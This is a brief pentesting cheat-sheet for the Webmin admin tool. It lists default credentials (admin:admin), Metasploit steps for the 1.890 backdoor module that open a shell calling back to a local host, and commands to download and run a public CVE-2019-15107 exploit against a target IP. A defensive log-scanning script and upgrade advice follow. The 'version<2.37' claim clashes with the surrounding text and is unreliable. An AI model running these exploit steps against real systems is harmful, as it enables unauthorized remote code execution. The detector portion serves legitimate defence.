Webmin Pentesting
Last modified: 2022-12-01
Webmin is a web-based system administration tool for Unix. The default port is 10000.
Default Credentials
admin:admin
password_change.cgi Command Injection version=1.890
msfconsole
msf> use exploit/linux/http/webmin_backdoor
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> run
shell
Remote Code Execution (RCE) version<2.37
Webmin version<2.37 is vulnerable to remote code execution.
Download the payload.
git clone https://github.com/MuirlandOracle/CVE-2019-15107
cd CVE-2019-15107
python3 CVE-2019-15107.py <target-ip>
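Both the 1.890 backdoor and CVE-2019-15107 are reached through password_change.cgi, so a defender's first check is whether anyone has POSTed to that endpoint without a session. The following detector is an added example, not part of the original page or of either exploit; it assumes Webmin's miniserv.log uses Common Log Format and runs over constructed sample lines.

```python
import re

# Constructed sample lines (assumed Common Log Format, as written by miniserv.log).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2022:10:00:01 +0000] "GET /session_login.cgi HTTP/1.1" 200 2331
10.0.0.9 - - [01/Dec/2022:10:00:07 +0000] "POST /password_change.cgi HTTP/1.1" 200 412
10.0.0.9 - - [01/Dec/2022:10:00:08 +0000] "POST /password_change.cgi HTTP/1.1" 200 405
10.0.0.5 - admin [01/Dec/2022:10:01:00 +0000] "GET /index.cgi HTTP/1.1" 200 9811
"""

# ip, ident, user, [timestamp], "METHOD path protocol", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Endpoint abused by the 1.890 backdoor and by CVE-2019-15107 (from the notes above).
SUSPECT_PATHS = {"/password_change.cgi"}


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_suspect_requests(log_text):
    """POSTs to a suspect path with no authenticated user ('-') are the hits."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if (rec and rec["method"] == "POST"
                and rec["path"] in SUSPECT_PATHS and rec["user"] == "-"):
            hits.append((rec["ip"], rec["ts"], rec["path"]))
    return hits


def summarize_by_source(hits):
    """Count hits per source IP so repeated attempts stand out."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_suspect_requests(SAMPLE_LOG)
    for ip, ts, path in hits:
        print(f"[ALERT] {ts} {ip} unauthenticated POST {path}")
    print(summarize_by_source(hits))
```

A hit means the host should be checked for the version and, for 1.890, for the SourceForge-distributed build; upgrading past the affected versions removes the exposure.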